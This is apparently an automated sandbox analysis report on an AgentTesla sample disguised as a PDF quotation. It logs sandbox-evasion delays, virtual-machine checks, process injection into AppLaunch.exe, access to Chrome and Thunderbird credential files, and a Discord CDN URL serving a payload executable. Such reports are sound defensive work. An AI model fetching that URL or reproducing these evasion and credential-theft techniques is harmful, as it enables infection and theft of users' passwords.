Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -594829s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -594704s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -594579s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -594454s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -594329s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -594204s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -594079s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -593960s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 599872	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 599282	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 599157	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 599047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 598329	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 598204	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 598079	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 597954	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 597829	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 597704	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 597579	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 597454	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 597329	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 597204	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 597079	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 596954	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 596829	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 596704	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 596579	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 596454	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 596329	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 596204	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 596079	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 595954	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 595829	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 595704	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 595579	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 595454	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 595329	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 595204	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 595079	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 594954	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 594829	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 594704	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 594579	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 594454	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 594329	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 594204	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 594079	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 593960	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Window / User API: threadDelayed 1042			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Window / User API: threadDelayed 8617			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 599872	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 599282	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 599157	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 599047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 598329	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 598204	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 598079	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 597954	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 597829	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 597704	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 597579	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 597454	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 597329	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 597204	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 597079	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 596954	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 596829	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 596704	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 596579	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 596454	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 596329	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 596204	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 596079	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 595954	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 595829	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 595704	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 595579	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 595454	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 595329	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 595204	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 595079	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 594954	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 594829	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 594704	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 594579	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 594454	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 594329	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 594204	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 594079	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 593960	Jump to behavior

Source: AppLaunch.exe, 0000000B.00000002.572594634.0000000009CF2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.0000000003547000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen"select * from Win32_ComputerSystem
Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.0000000003547000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual

Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 43E000	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 440000	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 6A6008	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Queries volume information: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Code function: 11_2_00FC679C GetUserNameW,

11_2_00FC679C

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.43e8d08.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.43e8d08.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.383676188.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.572091329.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.43e8d08.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.43e8d08.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.383676188.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.572091329.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	121 Windows Management Instrumentation	Path Interception	311 Process Injection	1 Disable or Modify Tools	1 OS Credential Dumping	1 Account Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	3 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Deobfuscate/Decode Files or Information	211 Input Capture	1 File and Directory Discovery	Remote Desktop Protocol	1 Data from Local System	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	Security Account Manager	23 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	12 Software Packing	NTDS	211 Security Software Discovery	Distributed Component Object Model	211 Input Capture	Scheduled Transfer	14 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	1 Process Discovery	SSH	1 Clipboard Data	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	131 Virtualization/Sandbox Evasion	Cached Domain Credentials	131 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	311 Process Injection	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 System Owner/User Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	1 Remote System Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	1 System Network Configuration Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	100%	Avira	TR/Dropper.Gen
QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	47%	ReversingLabs	ByteCode-MSIL.Backdoor.Androm
QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://cdn.discordap	0%	Avira URL Cloud	safe
https://cdn.discordappD	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cdn.discordapp.com	162.159.129.233	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://cdn.discordapp.com/attachments/1152164172566630421/1153564703793107036/Rezyurp.exe	false		high
https://cdn.discordapp.com/attachments/1152164172566630421/1153564703793107036/Rezyurp.exe	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/mgravell/protobuf-neti	QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.0000000004524000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383907625.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000045DA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000045DA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.0000000004524000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383907625.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000045DA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://cdn.discordapp.com/attachments/1152164172566630421/1153564703793107036/Reh	AppLaunch.exe, 0000000B.00000002.572339768.0000000006A30000.00000004.00000800.00020000.00000000.sdmp	false		high
